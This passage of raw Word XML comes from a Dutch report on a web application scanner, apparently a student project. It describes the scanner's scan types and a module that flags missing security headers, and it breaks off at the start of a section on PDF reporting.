          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00101BF5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252741632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53545C23" wp14:editId="03C19B46">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1957070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>763270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="260985" cy="260985"/>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js ic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14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00101BF5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252716032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FBDAEE7" wp14:editId="7CF34123">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3414395</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19113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580" name="Chevron 580"/>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D2F94" id="Chevron 580" o:spid="_x0000_s1026" type="#_x0000_t55" style="position:absolute;margin-left:268.85pt;margin-top:15.05pt;width:30pt;height:36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" adj="10800" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00101BF5">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252715008" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4CEEE260" wp14:editId="1B16DE8B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1002665</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>305435</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2343785" cy="224790"/>
                <wp:effectExtent l="0" t="0" r="18415" b="29210"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="579" name="Text Box 57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CEBCE6A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="00897DA6">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E260" id="Text Box 579" o:spid="_x0000_s1145" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:78.95pt;margin-top:24.05pt;width:184.55pt;height:17.7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" fillcolor="#ffd966" strokecolor="#ffc000 [3207]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0CEBCE6A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00F364DD" w:rsidRDefault="002A05E5" w:rsidP="00897DA6">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00F364DD">
                        <w:rPr>
                          <w:sz w:val="16"/>
                        </w:rPr>
                        <w:t>HTTP Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Figuur 4.17</w:t>
      </w:r>
      <w:r w:rsidR="0083347D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D60F205" w14:textId="32EC6EB2" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00F7458D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252748800" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="615889A6" wp14:editId="76603BC9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-716158</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="610" name="Rectangle 61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C6913" id="Rectangle 610" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-56.35pt;width:25pt;height:1031.7pt;z-index:-25056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YJ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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3177F8" w14:textId="77777777" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00F7458D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D5AFBEA" w14:textId="17625891" w:rsidR="00D47555" w:rsidRDefault="004677A9" w:rsidP="00F7458D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252216320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BF4A43A" wp14:editId="6AB46A47">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>23925493</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-396754537</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102590"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="541" name="Rectangle 541"/>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5C5BD" id="Rectangle 541" o:spid="_x0000_s1026" style="position:absolute;margin-left:1883.9pt;margin-top:-31240.45pt;width:25pt;height:1031.7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Thb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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DB4AE8">
        <w:t>Het scanproces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC6E0A" w14:textId="35415F2F"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F07B53">
        <w:t>entificeerd.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4530"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="0004139E" w14:paraId="05F4924F"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60ADB3" w14:textId="72D44C1B" w:rsidR="0004139E" w:rsidRDefault="0004139E" w:rsidP="00DB4AE8">
            <w:r>
              <w:t>Scanprocessen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004139E" w14:paraId="5DFF4A98"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9D91DB" w14:textId="06827AF4" w:rsidR="0004139E" w:rsidRDefault="0004139E" w:rsidP="00DB4AE8">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41F13807" w14:textId="4528724D" w:rsidR="0004139E" w:rsidRDefault="0004139E" w:rsidP="00DB4AE8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004139E" w14:paraId="31431491"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pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Zoekt naar een bepaalde tekst op een webpagina</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004139E" w14:paraId="1B901912"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pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Wacht een bepaalde tijd op een reactie van de server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0004139E" w14:paraId="0A2BCB34"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pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Controleert op security headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="196DD984" w14:textId="04AAF553" w:rsidR="00B6378B" w:rsidRDefault="002A4A48" w:rsidP="005A4148">
      <w:r>
        <w:t>Tabel 4.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21323C01" w14:textId="4CEB5E53" w:rsidR="001F7A69" w:rsidRDefault="001F7A69" w:rsidP="005A4148">
      <w:r>
        <w:t>Het scannen op misconfiguraties controleert enkel op security headers die niet ingesteld zijn aan de server kant en applicatie klant.</w:t>
      </w:r>
      <w:r w:rsidR="00923F9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352DC611" w14:textId="4A0730D3" w:rsidR="006C7246" w:rsidRDefault="006C7246" w:rsidP="006C7246">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Misconfiguraties</w:t>
      </w:r>
      <w:r w:rsidR="00905556">
        <w:t xml:space="preserve"> (Security Headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA393C1" w14:textId="367101A5" w:rsidR="008C3EDB" w:rsidRDefault="00EC3BBE" w:rsidP="001F7A69">
      <w:r>
        <w:t>Tijdens het c</w:t>
      </w:r>
      <w:r w:rsidR="00E354E6">
        <w:t xml:space="preserve">rawl proces worden er </w:t>
      </w:r>
      <w:r w:rsidR="009F1128">
        <w:t>hyper</w:t>
      </w:r>
      <w:r w:rsidR="00E354E6">
        <w:t xml:space="preserve">links verzameld, deze </w:t>
      </w:r>
      <w:r w:rsidR="009F1128">
        <w:t>hyper</w:t>
      </w:r>
      <w:r w:rsidR="00E354E6">
        <w:t>lin</w:t>
      </w:r>
      <w:r w:rsidR="00B9794E">
        <w:t>ks hebben allemaal een eigen header. Headers bevatten informatie over een webpagina en worden mee verzonden bij zowel een Request en bij een Response. De informatie die in de headers staan zijn vooral regels waar de server (Host) en client (webb</w:t>
      </w:r>
      <w:r w:rsidR="00B160CC">
        <w:t xml:space="preserve">rowser) </w:t>
      </w:r>
      <w:r w:rsidR="00821282">
        <w:t xml:space="preserve">zich aan moeten houden. </w:t>
      </w:r>
      <w:r w:rsidR="008C3EDB">
        <w:t>De security headers zijn ervoor om de server en client te beschermen tegen gebruikers die misbruik willen m</w:t>
      </w:r>
      <w:r w:rsidR="00075A27">
        <w:t>aken van een server of website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58926DF7" w14:textId="2F5400BD" w:rsidR="00DB57FA" w:rsidRDefault="00D371A8" w:rsidP="001F7A69">
      <w:r>
        <w:t xml:space="preserve">De Header module controleert op </w:t>
      </w:r>
      <w:r w:rsidR="00DB57FA">
        <w:t>6 security headers</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4530"/>
        <w:gridCol w:w="4530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00581A08" w14:paraId="011C87AB"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pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00581A08" w14:paraId="3EE4A39F"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EAF764" w14:textId="2D1BE360" w:rsidR="00581A08" w:rsidRDefault="00581A08" w:rsidP="001F7A69">
            <w:r>
              <w:t>X-Content-Type-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57219882" w14:textId="5D6750DD" w:rsidR="00581A08" w:rsidRDefault="00920F8E" w:rsidP="001F7A69">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Voorkomt MIME-sniffing van een Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00581A08" w14:paraId="109691F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6465CFEB" w14:textId="21EEA28F" w:rsidR="00581A08" w:rsidRDefault="00581A08" w:rsidP="001F7A69">
            <w:r>
              <w:t>X-Frame-Options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30E65D50" w14:textId="327BA159" w:rsidR="00581A08" w:rsidRDefault="00951A0A" w:rsidP="001F7A69">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Voorkomt </w:t>
            </w:r>
            <w:r w:rsidR="000E5685">
              <w:t>clickjacking in iframes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00581A08" w14:paraId="0FFD8D7A"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6A8AA4" w14:textId="5ADF02C4" w:rsidR="00581A08" w:rsidRDefault="00581A08" w:rsidP="001F7A69">
            <w:r>
              <w:t>X-XSS-Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4155B495" w14:textId="4BE9A048" w:rsidR="00581A08" w:rsidRDefault="000E5685" w:rsidP="001F7A69">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Voorkomt cross-site-scripting aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00581A08" w14:paraId="69B00947"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0D293087" w14:textId="387A0999" w:rsidR="00581A08" w:rsidRDefault="00581A08" w:rsidP="001F7A69">
            <w:r>
              <w:t>Content-Security-Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00376F28" w14:textId="27EEEE46" w:rsidR="00581A08" w:rsidRDefault="00814E39" w:rsidP="001F7A69">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Definieert van welke locatie een bestand ingeladen mag worden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00581A08" w14:paraId="6152A75D"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60C808" w14:textId="3CCEF7BE" w:rsidR="00581A08" w:rsidRDefault="00581A08" w:rsidP="001F7A69">
            <w:r>
              <w:t>Public-Key-Pins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E6979A" w14:textId="3419AF15" w:rsidR="00581A08" w:rsidRDefault="00814E39" w:rsidP="001F7A69">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Voorkomt het verpersoonlijken van gebruikers door aanvallers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00581A08" w14:paraId="145F751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3AEB925F" w14:textId="4D8AC042" w:rsidR="00581A08" w:rsidRDefault="0085137C" w:rsidP="001F7A69">
            <w:r>
              <w:t>HttpOnly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5B1C74" w14:textId="738EB176" w:rsidR="00581A08" w:rsidRDefault="000C414A" w:rsidP="001F7A69">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Voorkomt het stelen van Cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60A63A63" w14:textId="5AD34350" w:rsidR="001F7A69" w:rsidRDefault="00B9794E" w:rsidP="001F7A69">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A4A48">
        <w:t>Tabel 4.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056B19CF" w14:textId="19C40D01" w:rsidR="009A217C" w:rsidRDefault="009A217C">
      <w:r>
        <w:t>SecurityReport zoekt voor elke hyperlink naar deze 6 security headers</w:t>
      </w:r>
      <w:r w:rsidR="00D62F84">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wanneer er 1 niet gevonden is wordt het aangegeven als kwetsbaarheid.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77611718" w14:textId="3C8ECB55" w:rsidR="00322756" w:rsidRDefault="00322756" w:rsidP="00322756">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55E9949A" wp14:editId="6D279F60">
            <wp:extent cx="5384310" cy="1585261"/>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nalyse headers.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5414938" cy="1594279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1185F" w14:textId="68FE198C" w:rsidR="00773100" w:rsidRDefault="000F4055" w:rsidP="00F73F47">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 4.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3402EC0D" w14:textId="0F0925AB" w:rsidR="00804D89" w:rsidRDefault="006F347A" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252218368" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B6401D5" wp14:editId="352B6957">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>51494615</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-289048489</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102590"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="542" name="Rectangle 542"/>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4DF5A" id="Rectangle 542" o:spid="_x0000_s1026" style="position:absolute;margin-left:4054.7pt;margin-top:-22759.65pt;width:25pt;height:1031.7pt;z-index:-2510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Fi7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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="633EF21E" w14:textId="77777777" w:rsidR="00722BDB" w:rsidRDefault="00722BDB" w:rsidP="00C11437">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:sectPr w:rsidR="00722BDB" w:rsidSect="00446588">
          <w:headerReference w:type="default" r:id="rId73"/>
          <w:headerReference w:type="first" r:id="rId74"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="0" w:right="1418" w:bottom="0" w:left="1418" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0118BD5E" w14:textId="2F5A7F16" w:rsidR="00446588" w:rsidRDefault="00446588" w:rsidP="00376E85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252780544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="266A11AC" wp14:editId="7DB2A25D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-716567</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="648" name="Rectangle 6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9413A" id="Rectangle 648" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-56.35pt;width:25pt;height:1031.7pt;z-index:-25053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4w5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" fillcolor="#ffd966 [1943]" strokecolor="#ffd966" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="347724F4" w14:textId="01DDA6F4" w:rsidR="00773100" w:rsidRPr="009F60A0" w:rsidRDefault="00AA5DFB" w:rsidP="00376E85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4.5</w:t>
      </w:r>
      <w:r w:rsidR="00D3619C">
        <w:t>.4 Rapporteren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5CB818" w14:textId="3672CCC5" w:rsidR="00BA25A8" w:rsidRDefault="00BA25A8" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACD2537" w14:textId="55653259" w:rsidR="00D57B57" w:rsidRDefault="00F750E6" w:rsidP="008571B9">
      <w:r>
        <w:t>Al</w:t>
      </w:r>
      <w:r w:rsidR="00A45A50">
        <w:t xml:space="preserve">s uitgangspunt </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">maakt de </w:t>
      </w:r>
      <w:r w:rsidR="00097BD1">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> een rapport aan gebaseerd op de geïdentificeerde kwetsbaarheden. </w:t>
      </w:r>
      <w:r w:rsidR="00A45A50">
        <w:t>Het doel van dit rapport is om de</w:t>
      </w:r>
      <w:r w:rsidR="00C61957">
        <w:t xml:space="preserve"> gebruiker</w:t>
      </w:r>
      <w:r w:rsidR="00A45A50">
        <w:t xml:space="preserve"> te informeren </w:t>
      </w:r>
      <w:r w:rsidR="00867A91">
        <w:t>over de</w:t>
      </w:r>
      <w:r w:rsidR="00C61957">
        <w:t xml:space="preserve"> security staat waar de website </w:t>
      </w:r>
      <w:r w:rsidR="00867A91">
        <w:t xml:space="preserve">in verkeerd. </w:t>
      </w:r>
      <w:r w:rsidR="007A73EF">
        <w:t xml:space="preserve">Het rapport zal gegenereerd worden in </w:t>
      </w:r>
      <w:r w:rsidR="001609F7">
        <w:t>pdf-formaat</w:t>
      </w:r>
      <w:r w:rsidR="007A73EF">
        <w:t xml:space="preserve"> en zal informatie bevatten over alle gevonde</w:t>
      </w:r>
      <w:r w:rsidR="00FF1322">
        <w:t xml:space="preserve">n kwetsbaarheden </w:t>
      </w:r>
      <w:r w:rsidR="00E2382F">
        <w:t>op</w:t>
      </w:r>
      <w:r w:rsidR="00FF1322">
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r w:rsidR="00BF43B7">
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="001609F7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E2671">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B1849">
        <w:t>Na dat het rapport is gegenereerd wordt het via e-mail verstuur</w:t>
      </w:r>
